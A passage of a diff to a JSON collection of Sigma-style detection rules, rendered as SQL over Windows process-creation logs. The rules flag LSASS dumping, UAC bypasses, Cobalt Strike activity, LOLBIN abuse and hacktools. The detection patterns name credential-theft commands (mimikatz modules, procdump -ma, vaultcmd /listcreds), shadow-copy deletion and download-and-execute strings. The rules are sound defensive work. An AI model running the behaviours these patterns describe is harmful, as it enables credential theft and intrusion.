'%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\BITSADMIN%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_env_folder.yml" + "filename": "proc_creation_win_mmc_susp_child_process.yml" }, { - "title": "Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS", - "id": "07aa184a-870d-413d-893a-157f317f6f58", - "status": "test", - "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Credential Manager Access via VaultCmd", + "id": "58f50261-c53b-4c88-bd12-1d71f12eda4c", + "status": "experimental", + "description": "List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1615", - "attack.t1059.005" + "attack.credential_access", + "attack.t1555.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\VaultCmd.exe' ESCAPE '\\' OR OriginalFileName = 'VAULTCMD.EXE') AND CommandLine LIKE '%/listcreds:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_gather_network_info_execution.yml" + "filename": "proc_creation_win_vaultcmd_list_creds.yml" }, { - "title": "Suspicious RazerInstaller Explorer Subprocess", - "id": "a4eaf250-7dc1-4842-862a-5e71cd59a167", + "title": "UAC Bypass via Event Viewer", + "id": "be344333-921d-4c4d-8bb8-e584cf584780", "status": "test", - "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM", - "author": "Florian Roth (Nextron Systems), Maxime Thiebaut", + "description": "Detects UAC bypass method using Windows event viewer", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1553" + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ - "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\RazerInstaller.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\Razer\\\\Installer\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\SysWOW64\\\\WerFault.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_other_razorinstaller_lpe.yml" + "filename": "proc_creation_win_uac_bypass_eventvwr.yml" }, { - "title": "Potential Meterpreter/CobaltStrike Activity", - "id": "15619216-e993-4721-b590-4c520615a67d", - "status": "test", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "Potential LSASS Process Dump Via Procdump", + "id": "5afee48e-67dd-4e03-a783-f74259dcf998", + "status": "stable", + "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.defense_evasion", + "attack.t1036", + "attack.credential_access", + "attack.t1003.001", + "car.2013-05-009" ], "falsepositives": [ - "Commandlines containing components like cmd accidentally", - "Jobs and services started with cmd" + "Unlikely, because no one should dump an lsass process memory", + "Another tool that uses the command line switches of Procdump" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%\\\\pipe\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%cmd%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%.dll,a%' ESCAPE '\\' AND CommandLine LIKE '%/p:%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%MpCmdRun%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND CommandLine LIKE '% ls%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_meterpreter_getsystem.yml" + "filename": "proc_creation_win_sysinternals_procdump_lsass.yml" }, { - "title": "Use of OpenConsole", - "id": "814c95cc-8192-4378-a70a-f1aafd877af1", + "title": "Use of Remote.exe", + "id": "4eddc365-79b4-43ff-a9d7-99422dc34b93", "status": "experimental", - "description": "Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Legitimate use by an administrator" + "Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg)." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'OpenConsole.exe' OR NewProcessName LIKE '%\\\\OpenConsole.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.WindowsTerminal%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\remote.exe' ESCAPE '\\' OR OriginalFileName = 'remote.exe'))" ], - "filename": "proc_creation_win_lolbin_openconsole.yml" + "filename": "proc_creation_win_lolbin_remote.yml" }, { - "title": "CobaltStrike Load by Rundll32", - "id": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", - "status": "test", - "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", - "author": "Wojciech Lesicki", + "title": "HackTool - TruffleSnout Execution", + "id": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", + "status": "experimental", + "description": "Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' OR CommandLine LIKE '%rundll32 %' ESCAPE '\\')) AND (CommandLine LIKE '%.dll%' ESCAPE '\\' AND (CommandLine LIKE '% StartW' ESCAPE '\\' OR CommandLine LIKE '%,StartW' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'TruffleSnout.exe' OR NewProcessName LIKE '%\\\\TruffleSnout.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml" + "filename": "proc_creation_win_hktl_trufflesnout.yml" }, { - "title": "Renamed Remote Utilities RAT (RURAT) Execution", - "id": "9ef27c24-4903-4192-881a-3adde7ff92a5", + "title": "Obfuscated IP Via CLI", + "id": "56d19cb4-6414-4769-9644-1ed35ffbb148", "status": "experimental", - "description": "Detects execution of renamed Remote Utilities (RURAT) via Product PE header field", + "description": "Detects usage of an encoded/obfuscated version of an IP address (hex, octal...) via commandline", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.collection", - "attack.command_and_control", - "attack.discovery", - "attack.s0592" + "attack.discovery" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Product = 'Remote Utilities' AND NOT ((NewProcessName LIKE '%\\\\rutserv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rfusclient.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\') AND (CommandLine LIKE '% 0x%' ESCAPE '\\' OR CommandLine REGEXP ' [0-9]{7,13}'))" ], - "filename": "proc_creation_win_renamed_rurat.yml" + "filename": "proc_creation_win_susp_obfuscated_ip_via_cli.yml" }, { - "title": "IIS Native-Code Module Command Line Installation", - "id": "9465ddf4-f9e4-4ebd-8d98-702df3a93239", - "status": "test", - "description": "Detects suspicious IIS native-code module installations via command line", + "title": "PsExec Service Child Process Execution as LOCAL SYSTEM", + "id": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", + "status": "experimental", + "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.execution" ], "falsepositives": [ - "Unknown as it may vary from organisation to organisation how admins use to install IIS modules" + "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%install%' ESCAPE '\\' AND CommandLine LIKE '%module%' ESCAPE '\\' AND (CommandLine LIKE '%/name:%' ESCAPE '\\' OR CommandLine LIKE '%-name:%' ESCAPE '\\'))) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_iis_appcmd_susp_module_install.yml" + "filename": "proc_creation_win_sysinternals_psexesvc_as_system.yml" }, { - "title": "MSHTA Suspicious Execution 01", - "id": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", - "status": "test", - "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", - "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", + "title": "HackTool - SharpLdapWhoami Execution", + "id": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", + "status": "experimental", + "description": "Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.t1218.005", - "attack.execution", - "attack.t1059.007", - "cve.2020.1599" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Programs that use the same command line flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND (CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.lnk%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpLdapWhoami.exe' ESCAPE '\\' OR OriginalFileName LIKE '%SharpLdapWhoami%' ESCAPE '\\' OR Product = 'SharpLdapWhoami' OR (CommandLine LIKE '% /method:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /method:kerb' ESCAPE '\\' OR CommandLine LIKE '% /method:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /m:kerb' ESCAPE '\\')))" ], - "filename": "proc_creation_win_mshta_susp_execution.yml" + "filename": "proc_creation_win_hktl_sharpldapwhoami.yml" }, { - "title": "Execute Files with Msdeploy.exe", - "id": "646bc99f-6682-4b47-a73a-17b1b64c9d34", - "status": "test", - "description": "Detects file execution using the msdeploy.exe lolbin", - "author": "Beyu Denis, oscd.community", + "title": "Lolbin Unregmp2.exe Use As Proxy", + "id": "727454c0-d851-48b0-8b89-385611ab0704", + "status": "experimental", + "description": "Detect usage of the \"unregmp2.exe\" binary as a proxy to launch a custom version of \"wmpnscfg.exe\"", + "author": "frack113", "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.t1218" ], "falsepositives": [ - "System administrator Usage" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%verb:sync%' ESCAPE '\\' AND CommandLine LIKE '%-source:RunCommand%' ESCAPE '\\' AND CommandLine LIKE '%-dest:runCommand%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\msdeploy.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\unregmp2.exe' ESCAPE '\\' OR OriginalFileName = 'unregmp2.exe') AND CommandLine LIKE '% /HideWMP%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_msdeploy.yml" + "filename": "proc_creation_win_lolbin_unregmp2.yml" }, { - "title": "Active Directory Database Snapshot Via ADExplorer", - "id": "9212f354-7775-4e28-9c9f-8f0a4544e664", + "title": "HackTool - SharpImpersonation Execution", + "id": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", "status": "experimental", - "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", + "author": "Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1134.001", + "attack.t1134.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpImpersonation.exe' ESCAPE '\\' OR OriginalFileName = 'SharpImpersonation.exe' OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% binary:%' ESCAPE '\\') OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% shellcode:%' ESCAPE '\\') OR (CommandLine LIKE '% technique:CreateProcessAsUserW%' ESCAPE '\\' OR CommandLine LIKE '% technique:ImpersonateLoggedOnuser%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_adexplorer_execution.yml" + "filename": "proc_creation_win_hktl_sharp_impersonation.yml" }, { - "title": "PUA- IOX Tunneling Tool Execution", - "id": "d7654f02-e04b-4934-9838-65c46f187ebc", + "title": "Change Default File Association To Executable Via Assoc", + "id": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", "status": "experimental", - "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when a program changes the default file association of any extension to an executable.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.persistence", + "attack.t1546.001" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\iox.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe fwd -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe fwd -r %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -r %' ESCAPE '\\') OR (Hashes LIKE '%MD5=9DB2D314DD3F704A02051EF5EA210993%' ESCAPE '\\' OR Hashes LIKE '%SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD%' ESCAPE '\\' OR Hashes LIKE '%SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731%' ESCAPE '\\') OR md5 = '9db2d314dd3f704a02051ef5ea210993' OR sha1 = '039130337e28a6623ecf9a0a3da7d92c5964d8dd' OR sha256 = 'c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%assoc %' ESCAPE '\\' AND CommandLine LIKE '%exefile%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.exe=exefile%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_iox.yml" + "filename": "proc_creation_win_cmd_assoc_tamper_exe_file_association.yml" }, { - "title": "Suspicious File Characteristics Due to Missing Fields", - "id": "9637e8a5-7131-4f7f-bdc7-2b05d8670c43", + "title": "Suspicious Process Start Locations", + "id": "15b75071-74cc-47e0-b4c6-b43744a62a2b", "status": "test", - "description": "Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe", - "author": "Markus Neis, Sander Wiebing", + "description": "Detects suspicious process run from unusual locations", + "author": "juju4, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.006" + "attack.defense_evasion", + "attack.t1036", + "car.2013-05-002" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((Description LIKE '\\?' ESCAPE '\\' AND FileVersion LIKE '\\?' ESCAPE '\\') OR (Description LIKE '\\?' ESCAPE '\\' AND Product LIKE '\\?' ESCAPE '\\')) OR (Description LIKE '\\?' ESCAPE '\\' AND Company LIKE '\\?' ESCAPE '\\')) AND NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_file_characteristics.yml" + "filename": "proc_creation_win_rundll32_run_locations.yml" }, { - "title": "AgentExecutor PowerShell Execution", - "id": "7efd2c8d-8b18-45b7-947d-adfe9ed04f61", - "status": "experimental", - "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", - "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", + "title": "HTML Help HH.EXE Suspicious Child Process", + "id": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", + "status": "test", + "description": "Detects a suspicious child process of a Microsoft HTML Help (HH.exe)", + "author": "Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.initial_access", + "attack.t1047", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218", + "attack.t1218.001", + "attack.t1218.010", + "attack.t1218.011", + "attack.t1566", + "attack.t1566.001" ], "falsepositives": [ - "Legitimate use via Intune management. You exclude script paths and names to reduce FP rate" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertUtil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSHTA.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_agentexecutor.yml" + "filename": "proc_creation_win_hh_html_help_susp_child_process.yml" }, { - "title": "UtilityFunctions.ps1 Proxy Dll", - "id": "0403d67d-6227-4ea8-8145-4e72db7da120", + "title": "UAC Bypass Using IDiagnostic Profile", + "id": "4cbef972-f347-4170-b62a-8253f6168e6d", "status": "experimental", - "description": "Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.", - "author": "frack113", + "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1216" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%UtilityFunctions.ps1%' ESCAPE '\\' OR CommandLine LIKE '%RegSnapin %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_lolbin_utilityfunctions.yml" + "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml" }, { - "title": "Run PowerShell Script from ADS", - "id": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", + "title": "Suspicious SYSTEM User Process Creation", + "id": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", "status": "test", - "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", - "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ], + "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", + "author": "Florian Roth (Nextron Systems), David ANDRE (additional keywords)", "falsepositives": [ - "Unknown" + "Administrative activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Get-Content%' ESCAPE '\\' AND CommandLine LIKE '%-Stream%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((IntegrityLevel = 'System' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '% /urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -e% JAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% -e% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% -e% IAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '%vssadmin delete shadows%' ESCAPE '\\' OR CommandLine LIKE '%reg SAVE HKLM%' ESCAPE '\\' OR CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%event::clear%' ESCAPE '\\' OR CommandLine LIKE '%event::drop%' ESCAPE '\\' OR CommandLine LIKE '%id::modify%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%misc::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%sid::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%vault::cred%' ESCAPE '\\' OR CommandLine LIKE '%vault::list%' ESCAPE '\\' OR CommandLine LIKE '% p::d %' ESCAPE '\\' OR CommandLine LIKE '%;iex(%' ESCAPE '\\' OR 